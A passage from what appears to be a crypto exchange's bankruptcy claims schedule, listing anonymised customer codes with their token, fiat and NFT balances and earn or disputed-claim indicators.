| 07338398 | | DOGE[54.96301456], USD[0.00] | | |
| 07338399 | | USD[10.00] | | |
| 07338400 | | BF_POINT[300], BTC[53.70337183], ETH[73.44813963], SHIB[20], SOL[0], TRX[1], USD[122.90], USDT[0.00013013] | Yes | |
| 07338401 | | USD[10.00] | | |
| 07338402 | | USD[10.00] | | |
| 07338403 | | USD[0.01] | | |
| 07338404 | | DOGE[4097.20983337], USD[10.00] | | |
| 07338405 | | DOGE[139.04732559], USD[0.00] | | |
| 07338406 | | USD[10.00] | | |
| 07338407 | | BAT[630.72926663], BRZ[5], CUSDT[15], DOGE[19211.71497922], GRT[7363.52904979], MATIC[433.80215491], SHIB[8998622.53690223], TRX[4], USD[0.00], USDT[2.21034076], YFI[.01539737] | Yes | |
| 07338408 | | BTC[.00117294], ETH[0], LTC[0], SHIB[1], USD[0.00] | | |
| 07338409 | | CUSDT[1], DOGE[1574.45305075], SUSHI[.79675338], USD[0.00] | | |
| 07338410 | | BTC[.03945155], DOGE[192.18693244], USD[0.00], USDT[1] | | |
| 07338411 | | BTC[0], MATIC[5.09469409], SOL[0], USD[0.02] | Yes | |
| 07338412 | | AUD[0.00], DOGE[1.00000001], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07338413 | | BTC[.01345503], CUSDT[9], DOGE[25406.37964576], ETH[.32440129], ETHW[.32423257], KSHIB[2670.37169056], LTC[2.2395426], USD[0.00] | Yes | |
| 07338414 | | CUSDT[1], DOGE[1137.03093993], ETH[.02002391], ETHW[.02002391], TRX[2], USD[0.00] | | |
| 07338415 | | USD[10.00] | | |
| 07338416 | | USD[10.00] | | |
| 07338418 | | CUSDT[1], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07338419 | | CUSDT[2], ETH[.00347454], ETHW[.00347454], TRX[1], USD[0.00] | | |
| 07338420 | | USD[10.00] | | |
| 07338421 | | USD[10.00] | | |
| 07338423 | | BAT[1.02065667], CUSDT[1], DOGE[.00921902], USD[0.00], USDT[0.00000001] | Yes | |
| 07338424 | | USD[10.00] | | |
| 07338426 | | BRZ[1], CUSDT[4], DOGE[1], USD[0.40], USDT[0] | | |
| 07338427 | | DOGE[1.14697847], USD[0.01] | | |
| 07338428 | | USD[10.00] | | |
| 07338429 | | USD[10.00] | | |
| 07338430 | | USD[10.00] | | |
| 07338431 | | USD[10.00] | | |
| 07338432 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338433 | | USD[10.00] | | |
| 07338434 | | USD[10.00] | | |
| 07338435 | | BRZ[0], DOGE[0], TRX[3], USD[0.00], USDT[0] | | |
| 07338436 | | USD[10.00] | | |
| 07338437 | | DOGE[15470.96602499], TRX[1], USD[250.00] | | |
| 07338438 | | BTC[0], DOGE[0], ETH[0.00000001], USD[0.00], USDT[0] | | |
| 07338439 | | CUSDT[3], DOGE[57.24805879], ETHW[.00974717], SOL[0.04037386], TRX[3], USD[0.24] | Yes | |
| 07338440 | | BTC[.00025617], USD[0.00] | | |
| 07338441 | | USD[10.00] | | |
| 07338442 | | ETH[0], SOL[.005] | | |
| 07338443 | | USD[10.00] | | |
| 07338444 | | USD[10.00] | | |
| 07338445 | | BRZ[1], CUSDT[5], DOGE[.01805515], SUSHI[0], TRX[2], USD[0.00], USDT[1.10062791] | Yes | |
| 07338446 | | AAVE[.23465097], BAT[1.0165555], BRZ[2], BTC[.00002027], CUSDT[14], DOGE[2068.8101728], ETH[.00000001], GRT[40.33638197], MATIC[84.96369607], SOL[7.65857058], SUSHI[10.95726593], TRX[70.06901788], USD[0.00], USDT[1.11062383] | Yes | |
| 07338447 | | USD[10.00] | | |
| 07338448 | | USD[10.01] | | |
| 07338449 | | USD[10.00] | | |
| 07338451 | | CUSDT[1], TRX[490.42494537], USD[0.00] | Yes | |
| 07338453 | | BAT[56.29141216], BRZ[1], CUSDT[5], SHIB[284393.69568091], TRX[593.57120678], USD[0.00], USDT[0.00000001] | Yes | |
| 07338454 | | USD[10.00] | | |
| 07338455 | | USD[10.00] | | |
| 07338456 | | USD[0.01] | | |
| 07338457 | | CUSDT[471.91203182], DOGE[1], USD[0.00] | | |
| 07338459 | | USD[10.00] | | |
| 07338460 | | DOGE[166.96493924], USD[0.00] | | |
| 07338461 | | USD[10.00] | | |
| 07338463 | | BRZ[2], CUSDT[2], ETH[.00431783], ETHW[.00431783], GRT[1], LTC[.00159032], TRX[2], USD[0.90], USDT[1] | | |
| 07338464 | | USD[0.02] | Yes | |
| 07338465 | | USD[10.00] | | |
| 07338467 | | CUSDT[34], SHIB[1], TRX[5], USD[13.36] | Yes | |
| 07338469 | | USD[10.00] | | |
| 07338470 | | USD[10.00] | | |
| 07338471 | | USD[10.00] | | |
| 07338472 | | USD[10.00] | | |
| 07338473 | | ETH[.00531487], ETHW[.00531487], USD[0.00] | | |
| 07338474 | | USD[10.00] | | |
| 07338475 | | DOGE[1], SHIB[444642.06313917], USD[0.00] | | |
| 07338476 | | BTC[.00000008], USD[0.00] | | |
| 07338477 | | DOGE[527.41191901], LINK[.38446966], TRX[1], UNI[4.44299355], USD[0.00] | | |
| 07338478 | | BTC[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07338479 | | CUSDT[2], USD[0.00] | | |
| 07338480 | | USD[10.00] | | |
| 07338481 | | USD[10.00] | | |
| 07338483 | | CUSDT[1], DOGE[1975.27313488], TRX[1], USD[0.00] | | |
| 07338484 | | USD[10.00] | | |
| 07338485 | | BTC[0.00000009], CUSDT[5], DOGE[0], SHIB[2970354.67031552], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07338487 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07338488 | | USD[11.09] | Yes | |
| 07338489 | | BRZ[1], CUSDT[13], DOGE[1500.58832991], NFT (439949596901864032/Bahrain Ticket Stub #545)[1], NFT (509577549277032519/Entrance Voucher #2914)[1], SHIB[9521125.56614396], TRX[209.44038379], USD[0.00] | Yes | |
| 07338490 | | BTC[0], USD[0.00] | | |
| 07338491 | | USD[10.00] | | |
| 07338492 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], UNI[0], USD[0.00], YFI[0] | | |
| 07338493 | | USD[10.00] | | |
| 07338494 | | USD[10.00] | | |
| 07338495 | | BAT[2], DOGE[4], ETH[0], SHIB[1], TRX[34.81248443], USD[0.00], USDT[1] | | |
| 07338496 | | USD[10.00] | | |
| 07338497 | | BRZ[2], CUSDT[4], DOGE[.00379612], SOL[2.65992093], TRX[2], USD[0.60], USDT[0.00000001] | Yes | |
| 07338498 | | CUSDT[1], DOGE[621.33362268], ETH[.00558397], ETHW[.00558397], TRX[2], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338499 | | USD[10.00] | | |
| 07338500 | | TRX[2], USD[0.01] | | |
| 07338501 | | BAT[5.44430456], BRZ[2.00215379], BTC[0], CUSDT[7], DOGE[2], GRT[5.2292227], LINK[3.26184672], SOL[0], SUSHI[3.258259], TRX[10.00121641], UNI[3.28470303], USD[0.00], USDT[25.25179422] | Yes | |
| 07338502 | | CUSDT[2], DOGE[1.00004582], SUSHI[.00335646], USD[0.82] | | |
| 07338503 | | BRZ[4], DOGE[1], TRX[0], USD[0.01] | | |
| 07338504 | | USD[10.00] | | |
| 07338505 | | USD[10.00] | | |
| 07338506 | | ALGO[0], BAT[0], BRZ[0], BTC[0], CUSDT[1], DOGE[0.00012794], ETH[0.00000023], GRT[1], KSHIB[0], LINK[0], MATIC[0.00092179], NFT (550026924017791214/Munk #760)[1], SHIB[1162634.78406030], SOL[0.00000273], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000922] | Yes | |
| 07338507 | | DOGE[.00377993], USD[0.51] | | |
| 07338508 | | BRZ[1], CUSDT[5], GRT[1.00404471], TRX[2], USD[0.05] | Yes | |
| 07338509 | | USD[10.00] | | |
| 07338510 | | USD[10.00] | | |
| 07338511 | | USD[10.56] | Yes | |
| 07338512 | | CUSDT[1], DOGE[.0000591], TRX[2], USD[1.01] | | |
| 07338513 | | USD[10.00] | | |
| 07338515 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07338516 | | CUSDT[3], DAI[0], DOGE[3.99969081], TRX[0], USD[0.00], USDT[0] | | |
| 07338517 | | BCH[.00183306], BTC[.00033809], CUSDT[1], DOGE[148.56660701], ETH[.00340605], ETHW[.00336501], SHIB[598332.75681673], SOL[.12418803], USD[0.01] | Yes | |
| 07338518 | | DOGE[1.09947974], USD[0.00] | | |
| 07338519 | | USD[10.00] | | |
| 07338520 | | USD[10.00] | | |
| 07338521 | | DOGE[119.355998], USD[10.00] | | |
| 07338522 | | BRZ[1], CUSDT[9], TRX[1], USD[0.01] | | |
| 07338523 | | CUSDT[2], DOGE[120.69688377], GRT[3.15397163], SOL[.04441563], TRX[1], USD[0.71] | | |
| 07338524 | | BRZ[2], CUSDT[2], DOGE[10.32952374], TRX[2], USD[0.01] | | |
| 07338525 | | DOGE[1.00003352], USD[6.85] | | |
| 07338526 | | USD[10.00] | | |
| 07338527 | | USD[10.00] | | |
| 07338528 | | USD[10.00] | | |
| 07338529 | | USD[10.00] | | |
| 07338532 | | BTC[.00017568], USD[0.00] | | |
| 07338533 | | USD[10.00] | | |
| 07338534 | | USD[0.00] | | |
| 07338535 | | USD[10.00] | | |
| 07338536 | | USD[10.00] | | |
| 07338537 | | USD[0.02] | | |
| 07338538 | | DOGE[.00023572], USD[9.66], USDT[0.00307343] | | |
| 07338539 | | BAT[704.30357995], BRZ[2], BTC[.03603546], CUSDT[3], DOGE[4.02186636], ETH[3.37019181], ETHW[3.36877635], LINK[406.12084873], LTC[4.36408686], TRX[5], USD[0.00] | Yes | |
| 07338540 | | BTC[0.00877791], DOGE[1.00320074], ETH[0.22517278], ETHW[0.22496091], SHIB[3547966.78649264], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07338541 | | USD[10.81] | Yes | |
| 07338542 | | BTC[0], CUSDT[1], DOGE[0], MATIC[0], SUSHI[0], USD[0.00] | Yes | |
| 07338543 | | USD[10.00] | | |
| 07338544 | | USD[0.13] | Yes | |
| 07338545 | | USD[10.90] | Yes | |
| 07338546 | | TRX[1], USD[0.00] | | |
| 07338547 | | CUSDT[3], DOGE[.0000177], LINK[.00002831], TRX[1], USD[0.00] | | |
| 07338548 | | BTC[.00000005], GRT[.1900547] | Yes | |
| 07338549 | | BAT[7.29432416], BF_POINT[200], BRZ[1], BTC[0], CUSDT[3], DOGE[2], ETH[0.02350993], ETHW[1.02403039], GRT[0], LINK[0.28774950], NFT (316459570902542538/CryptoAvatar #85)[1], NFT (389431218837013728/Mad Lions Series #8)[1], NFT (427863600748750916/AI-generated landscape #28)[1], NFT (457418001612068301/FTX Planet #2)[1], NFT (465882164323042571/Anime #4)[1], NFT (526015664661515639/Skull #0001 -XRP)[1], NFT (568951370004473756/Vegas )[1], SHIB[1], SOL[7.11879986], USD[0.00], USDT[1.07966203] | Yes | |
| 07338550 | | DOGE[30.83587375], USD[0.00] | | |
| 07338552 | | USD[10.00] | | |
| 07338553 | | USD[10.00] | | |
| 07338554 | | USD[10.00] | | |
| 07338555 | | BRZ[6], CUSDT[19], TRX[18.72920564], USD[0.00], USDT[1] | | |
| 07338556 | | USD[10.00] | | |
| 07338557 | | USD[10.00] | | |
| 07338558 | | GRT[8.26034933], USD[0.00] | | |
| 07338559 | | BAT[2.04704693], BRZ[1], CUSDT[34], DOGE[13.46157393], TRX[18.08107913], USD[0.00], USDT[1.06604334] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338560 | | CUSDT[2], USD[0.00], USDT[0.00000001] | | |
| 07338561 | | USD[10.00] | | |
| 07338562 | | USD[10.00] | | |
| 07338563 | | BRZ[1], CUSDT[2], DOGE[3], GRT[6.04099077], MATIC[30.25772969], TRX[1], USD[0.00] | Yes | |
| 07338564 | | USD[10.00] | | |
| 07338566 | | USD[10.00] | | |
| 07338567 | | BAT[1], BCH[0], CUSDT[1], ETH[0], GRT[1], SHIB[1], TRX[3], USD[0.01] | | |
| 07338568 | | USD[10.00] | | |
| 07338569 | | USD[10.00] | | |
| 07338570 | | USD[10.00] | | |
| 07338571 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07338572 | | USD[10.00] | | |
| 07338573 | | TRX[1], USD[0.00] | | |
| 07338574 | | BRZ[2], CUSDT[6], DOGE[67946.92721195], SHIB[31.96444444], TRX[4], USD[0.00] | | |
| 07338575 | | DOGE[0], USD[0.00] | Yes | |
| 07338576 | | BRZ[3], CUSDT[15], GRT[2], TRX[1], USD[2.00] | | |
| 07338578 | | BRZ[1], CUSDT[1], DOGE[2], USD[92.78] | | |
| 07338579 | | BTC[0], DAI[10.01133446], DOGE[0], LTC[0], USD[0.00] | | |
| 07338581 | | USD[10.00] | | |
| 07338582 | | ETH[0], GRT[0], LINK[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07338583 | | CUSDT[1], LINK[0], USD[0.00] | Yes | |
| 07338584 | | USD[10.00] | | |
| 07338585 | | BTC[.00001929], USD[0.00] | | |
| 07338586 | | USD[10.00] | | |
| 07338587 | | BAT[1], ETHW[.05024319], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07338588 | | DOGE[128.24735117], USD[0.00] | | |
| 07338589 | | DOGE[448.22150207], USD[0.00] | | |
| 07338591 | | CUSDT[1], DOGE[94.61328465], USD[0.00] | | |
| 07338592 | | USD[10.00] | | |
| 07338593 | | DOGE[6378.29625533], USD[0.00] | | |
| 07338594 | | CUSDT[1], TRX[2], USD[271.69] | | |
| 07338595 | | BRZ[2], CUSDT[5.46462200], DOGE[431.90608729], GRT[0], SHIB[3681302.95007261], SOL[0], TRX[12.80985454], USD[0.00], USDT[0.13264766] | | |
| 07338597 | | USD[10.00] | | |
| 07338599 | | USD[10.00] | | |
| 07338600 | | DOGE[1], USD[0.00] | | |
| 07338601 | | USD[10.00] | | |
| 07338602 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07338603 | | BTC[0], NFT (498047955970016621/Magic Eden Pass)[1], USD[0.01] | Yes | |
| 07338604 | | USD[10.00] | | |
| 07338605 | | NFT (397178820958892026/DIVISION)[1], NFT (510918761643173713/MinnesotaMarina)[1], SHIB[622471.50560842], USD[0.00] | Yes | |
| 07338606 | | USD[10.00] | | |
| 07338607 | | DOGE[.00003551], USD[0.00] | | |
| 07338608 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07338609 | | USD[10.00] | | |
| 07338610 | | USD[0.00] | | |
| 07338611 | | USD[10.00] | | |
| 07338612 | | DOGE[269.82229891], USD[0.00] | | |
| 07338613 | | USD[10.00] | | |
| 07338614 | | CUSDT[1], USD[0.01] | | |
| 07338615 | | USD[10.00] | | |
| 07338616 | | DOGE[1], USD[0.01], USDT[0] | Yes | |
| 07338618 | | USD[10.00] | | |
| 07338619 | | BTC[.00041013], USD[10.00] | | |
| 07338620 | | USD[10.00] | | |
| 07338621 | | BAT[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SGD[0.00], SHIB[0], SOL[0], TRX[0], USD[1.09], YFI[0] | Yes | |
| 07338622 | | USD[10.00] | | |
| 07338623 | | USD[0.00], USDT[0] | | |
| 07338624 | | CUSDT[2298.08986521], DOGE[5235.47252933], LINK[4.13789208], SHIB[1945543.05918305], TRX[165.31390294], UNI[1.23850322], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338625 | | USD[10.00] | | |
| 07338626 | | CUSDT[1], SUSHI[85.77731998], USD[0.00] | Yes | |
| 07338627 | | CUSDT[3], DOGE[56.65794071], TRX[3], USD[0.30] | | |
| 07338628 | | USD[10.00] | | |
| 07338629 | | DOGE[1], USD[0.01] | | |
| 07338630 | | DOGE[0], MATIC[.00073681], SHIB[138.32436115], TRX[0], USD[0.00] | Yes | |
| 07338631 | | USD[10.00] | | |
| 07338632 | | USD[20.00] | | |
| 07338633 | | USD[10.00] | | |
| 07338634 | | USD[10.00] | | |
| 07338635 | | USD[10.00] | | |
| 07338636 | | USD[10.00] | | |
| 07338637 | | USD[10.00] | | |
| 07338638 | | USD[10.00] | | |
| 07338639 | | USD[10.00] | | |
| 07338640 | | BTC[.00095371], DOGE[2853.54466570], USD[0.00] | | |
| 07338641 | | DOGE[2], ETH[0.00000689], ETHW[0.00059377], TRX[1], USD[0.00] | Yes | |
| 07338642 | | DOGE[31.7170826], USD[0.00] | | |
| 07338643 | | USD[10.00] | | |
| 07338644 | | USD[10.00] | | |
| 07338645 | | USD[10.00] | | |
| 07338648 | | USD[10.00] | | |
| 07338649 | | CUSDT[1], DOGE[4], GRT[45.97801053], LINK[1], SOL[22.56086643], SUSHI[6.42735917], TRX[1777.43619403], USD[618.55] | | |
| 07338650 | | USD[0.00] | | |
| 07338651 | | USD[10.00] | | |
| 07338652 | | USD[10.00] | | |
| 07338653 | | USD[10.00] | | |
| 07338654 | | SOL[3.81096684], USD[0.00] | | |
| 07338655 | | USD[10.00] | | |
| 07338656 | | DOGE[.02280984], USD[0.15] | | |
| 07338658 | | DOGE[122.57210702], TRX[1], USD[0.00] | | |
| 07338659 | | USD[10.00] | | |
| 07338660 | | DOGE[2.01164309], USD[0.01] | | |
| 07338661 | | USD[10.00] | | |
| 07338663 | | DOGE[7.58472793], ETHW[7.91812366], NFT (567364610122402233/Entrance Voucher #3694)[1], SHIB[132603.53513474], USD[0.00] | Yes | |
| 07338664 | | CUSDT[1], DOGE[3], USD[0.01] | | |
| 07338665 | | USD[10.00] | | |
| 07338666 | | DOGE[1385.94706423], TRX[1], USD[0.00] | | |
| 07338667 | | CUSDT[1], USD[0.01], USDT[0] | | |
| 07338670 | | CUSDT[5], DOGE[.00003521], USD[0.00] | | |
| 07338671 | | USD[0.71] | | |
| 07338672 | | CUSDT[1], TRX[1], USD[70.30] | | |
| 07338673 | | USD[10.00] | | |
| 07338674 | | USD[10.00] | | |
| 07338675 | | BRZ[1], CUSDT[1], ETH[.03826044], ETHW[.03826044], MATIC[190.61541415], SHIB[6263048.01670146], TRX[1], USD[10.00] | | |
| 07338676 | | USD[10.00] | | |
| 07338677 | | USD[10.00] | | |
| 07338678 | | USD[10.00] | | |
| 07338679 | | USD[0.00] | Yes | |
| 07338680 | | USD[10.00] | | |
| 07338681 | | USD[10.00] | | |
| 07338683 | | CUSDT[4], TRX[2], USD[0.00] | | |
| 07338685 | | USD[10.00] | | |
| 07338686 | | DOGE[1], UNI[.31070645], USD[0.01] | | |
| 07338687 | | USD[10.00] | | |
| 07338688 | | USD[10.00] | | |
| 07338689 | | BTC[0], CUSDT[1], ETH[0], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07338690 | | BAT[2.07434019], BRZ[8.86699211], CUSDT[11], SOL[0], SUSHI[0], TRX[8], USD[0.00], USDT[0.00000124] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338691 | | CUSDT[1], DOGE[449.25593748], TRX[1], USD[14.82] | | |
| 07338693 | | BAT[0], USD[0.00] | | |
| 07338694 | | CUSDT[2], SUSHI[.57851074], USD[0.00] | Yes | |
| 07338695 | | USD[0.01] | | |
| 07338696 | | USD[10.00] | | |
| 07338697 | | USD[100.00] | | |
| 07338698 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SHIB[1], SOL[0], USD[0.00] | | |
| 07338699 | | CUSDT[2], DOGE[0], TRX[0], USD[0.01] | Yes | |
| 07338700 | | BAT[2], DOGE[.0010519], USD[0.01], USDT[1] | | |
| 07338701 | | USD[10.00] | | |
| 07338702 | | USD[0.00] | | |
| 07338703 | | USD[10.00] | | |
| 07338705 | | CUSDT[1], USD[0.00] | | |
| 07338706 | | TRX[138.78406836], USD[0.00] | | |
| 07338707 | | USD[10.00] | | |
| 07338708 | | BAT[1], DOGE[5327.45199174], TRX[1], USD[0.00] | | |
| 07338709 | | USD[10.00] | | |
| 07338710 | | USD[10.00] | | |
| 07338711 | | DAI[.0000962], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07338712 | | DOGE[104.50418082], EUR[0.17], USD[0.00] | | |
| 07338713 | | DOGE[1], TRX[1], USD[0.56] | | |
| 07338714 | | BAT[37.01390857], BTC[.00514008], CUSDT[476.11567489], DOGE[1], LINK[1], TRX[30187.80359232], USD[0.00] | | |
| 07338715 | | ALGO[.00413649], BAT[.00114796], BRZ[.00178252], ETH[.00000011], ETHW[.39987628], GRT[.00582259], NFT (41740360538760329/Saudi Arabia Ticket Stub #2174)[1], SHIB[1], TRX[0], USD[32.76], YFI[.00000004] | Yes | |
| 07338716 | | BAT[1], BRZ[1], CUSDT[5], DOGE[1], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07338717 | | DOGE[22.43745021], TRX[1], USD[0.00] | Yes | |
| 07338718 | | CUSDT[1], TRX[1], USD[0.00], USDT[0.00000095] | | |
| 07338719 | | USD[10.00] | | |
| 07338720 | | USD[10.00] | | |
| 07338721 | | CUSDT[1], USD[0.00] | Yes | |
| 07338722 | | DOGE[.00006913], GRT[1], USD[0.00] | | |
| 07338723 | | USD[10.00] | | |
| 07338724 | | GRT[4.33027536], SHIB[75583.15061953], USD[0.04] | Yes | |
| 07338725 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07338726 | | USD[10.00] | | |
| 07338727 | | CUSDT[1], USD[8.68], USDT[0] | | |
| 07338728 | | USD[0.00] | | |
| 07338729 | | BRZ[1], BTC[.00020377], DOGE[.0000497], ETH[.00550856], ETHW[.00550856], USD[102.99] | | |
| 07338730 | | BRZ[1], CUSDT[6], USD[0.38], USDT[0] | Yes | |
| 07338732 | | SUSHI[.69460294], USD[0.00] | | |
| 07338733 | | USD[10.00] | | |
| 07338734 | | DOGE[67.76261977], TRX[1], USD[0.00] | | |
| 07338735 | | USD[0.06] | | |
| 07338736 | | USD[10.00] | | |
| 07338737 | | BAT[1], BRZ[1], CUSDT[1], GRT[1], USD[0.01] | | |
| 07338738 | | USD[17.60] | Yes | |
| 07338739 | | BAT[1], BRZ[2], CUSDT[4.00441645], GRT[2], MATIC[1.00126101], SHIB[785.40549305], SOL[.0000038], SUSHI[1.00218503], TRX[5], USD[0.01], USDT[0.00000001] | Yes | |
| 07338740 | | BAT[1.01362424], BRZ[2], DOGE[2], ETH[1.08716842], ETHW[1.08671172], SOL[260.46740843], TRX[38180.10723942], UNI[38.40464533], USD[378.85], USDT[105.45886786] | Yes | |
| 07338741 | | DOGE[4.10967767], USD[0.00] | | |
| 07338742 | | DOGE[0], USD[0.00] | | |
| 07338743 | | BAT[.47429113], BRZ[2], CUSDT[5], DOGE[6.20399283], TRX[3164.16046059], USD[0.00] | Yes | |
| 07338744 | | USD[10.00] | | |
| 07338745 | | USD[10.00] | | |
| 07338746 | | DOGE[11.2762229], MATIC[16.98515824], SHIB[2], USD[0.00] | Yes | |
| 07338747 | | USD[10.00] | | |
| 07338748 | | ETH[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07338749 | | BAT[1], BRZ[1], CUSDT[5], ETH[.01447971], ETHW[.01447971], TRX[2], USD[0.00] | | |
| 07338750 | | USD[10.00] | | |
| 07338751 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338753 | | CUSDT[1], DOGE[3], USD[0.01] | | |
| 07338754 | | USD[10.00] | | |
| 07338755 | | USD[10.00] | | |
| 07338756 | | USD[0.00] | | |
| 07338757 | | DOGE[135.24702463], TRX[1], USD[0.00] | | |
| 07338758 | | BAT[1.0165555], BRZ[0.00000025], LINK[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000010] | Yes | |
| 07338759 | | BRZ[2], CUSDT[3], DOGE[114.26052188], TRX[2], USD[0.01] | | |
| 07338760 | | BTC[0.05128008], SOL[0.00608684] | | |
| 07338761 | | USD[10.00] | | |
| 07338762 | | ETH[.00258226], ETHW[.00258226], USD[0.00] | | |
| 07338763 | | USD[10.00] | | |
| 07338764 | | USD[10.00] | | |
| 07338766 | | USD[10.00] | | |
| 07338767 | | BAT[1], BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], TRX[11], USD[0.00], USDT[0] | | |
| 07338768 | | USD[10.00] | | |
| 07338770 | | BTC[.00198648], DOGE[199.96232518], ETH[0.13303850], ETHW[0.13196886], SOL[3.37969741], TRX[1], USD[0.00] | Yes | |
| 07338771 | | USD[10.00] | | |
| 07338772 | | USD[10.00] | | |
| 07338773 | | USD[10.00] | | |
| 07338774 | | CUSDT[2], USD[0.00] | Yes | |
| 07338775 | | USD[10.00] | | |
| 07338776 | | USD[10.00] | | |
| 07338777 | | USD[10.00] | | |
| 07338778 | | USD[10.00] | | |
| 07338779 | | USD[10.00] | | |
| 07338780 | | USD[10.00] | | |
| 07338781 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], TRX[2], USD[111.09], USDT[0] | Yes | |
| 07338782 | | ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07338783 | | BAT[1.01988021], BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07338784 | | DOGE[134.82503754], USD[0.00] | | |
| 07338785 | | CUSDT[1], USD[0.00] | | |
| 07338786 | | BRZ[6.63168851], CUSDT[43], DOGE[2], ETH[0], ETHW[0], GRT[55.43468488], USD[0.00], USDT[0.00302618] | Yes | |
| 07338788 | | BTC[.0010924], TRX[1], USD[0.00] | | |
| 07338790 | | USD[10.00] | | |
| 07338792 | | TRX[2], USD[0.00] | | |
| 07338793 | | USD[10.00] | | |
| 07338794 | | USD[10.78] | Yes | |
| 07338795 | | CUSDT[2], DOGE[15452.14927188], SHIB[4589146.75784051], TRX[9315.28786568], USD[10.01] | | |
| 07338796 | | USD[10.00] | | |
| 07338797 | | USD[20.00] | | |
| 07338798 | | USD[10.00] | | |
| 07338799 | | USD[0.00] | | |
| 07338800 | | BAT[0], BCH[0], BF_POINT[300], BTC[0], CUSDT[0], DAI[0], DOGE[2], ETH[0.00000119], ETHW[0.00000119], GBP[0.00], LINK[0], MATIC[0], NFT (320479704281999609/For the lead )[1], NFT (385846735318447831/Furry vs Wilder #3 0f 5 )[1], NFT (510293392508706910/Kid Dynamite #2 of 5 )[1], SHIB[4], SOL[0], SUSHI[0], TRX[3.00022300], USD[0.01], USDT[0.00000001] | Yes | |
| 07338801 | | USD[10.00] | | |
| 07338803 | | USD[10.00] | | |
| 07338804 | | USD[10.00] | | |
| 07338805 | | BAT[1], CUSDT[2], DOGE[2], GRT[1], KSHIB[445373.72008351], TRX[4], USD[0.00], USDT[0.00000001] | | |
| 07338806 | | BF_POINT[300] | Yes | |
| 07338807 | | USD[0.00] | | |
| 07338808 | | USD[0.00] | | |
| 07338809 | | USD[10.00] | | |
| 07338810 | | CUSDT[1], USD[0.00] | | |
| 07338811 | | BRZ[7.65681342], CUSDT[35], SHIB[3], TRX[1], USD[0.01] | Yes | |
| 07338814 | | USD[10.00] | | |
| 07338815 | | USD[10.00] | | |
| 07338816 | | USD[0.00] | | |
| 07338817 | | GRT[2.12626304], SUSHI[.30325634], USD[0.00] | | |
| 07338818 | | BRZ[0], BTC[.00274125], CUSDT[6], DOGE[223.65286709], ETH[.03950225], ETHW[.03950225], LINK[1.1455775], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338819 | | CUSDT[1], USD[0.00] | Yes | |
| 07338820 | | TRX[102.59132021], USD[0.12] | Yes | |
| 07338821 | | USD[11.08] | Yes | |
| 07338822 | | USD[10.00] | | |
| 07338823 | | BAT[2], BRZ[1], CUSDT[3], DOGE[1.53079860], TRX[4], USD[0.00] | | |
| 07338824 | | USD[10.00] | | |
| 07338825 | | USD[10.00] | | |
| 07338826 | Contingent, Disputed | USD[0.19], USDT[0] | | |
| 07338827 | | USD[10.00] | | |
| 07338828 | | CUSDT[1], DOGE[213.53200034], USD[0.00] | | |
| 07338829 | | USD[0.00], USDT[0] | Yes | |
| 07338830 | | BTC[0.00000670], DOGE[3090.458], ETH[.00051955], ETHW[0.00051955], LINK[.0454], SOL[0.00550175], USD[4.20], USDT[6968.767439] | | |
| 07338833 | | CUSDT[2], DOGE[24323.40174669], USD[0.00], USDT[0] | | |
| 07338834 | | USD[10.00] | | |
| 07338836 | | USD[10.00] | | |
| 07338837 | | USD[0.00] | | |
| 07338838 | | USD[10.00] | | |
| 07338839 | | USD[10.88] | Yes | |
| 07338840 | | USD[0.00] | | |
| 07338841 | | USD[10.00] | | |
| 07338842 | | DOGE[106.06329942], USD[5.00] | | |
| 07338843 | | BTC[.01855481], CUSDT[4], DOGE[5], ETH[.23078679], ETHW[.23078679], LTC[1.07495578], TRX[1], USD[0.00] | | |
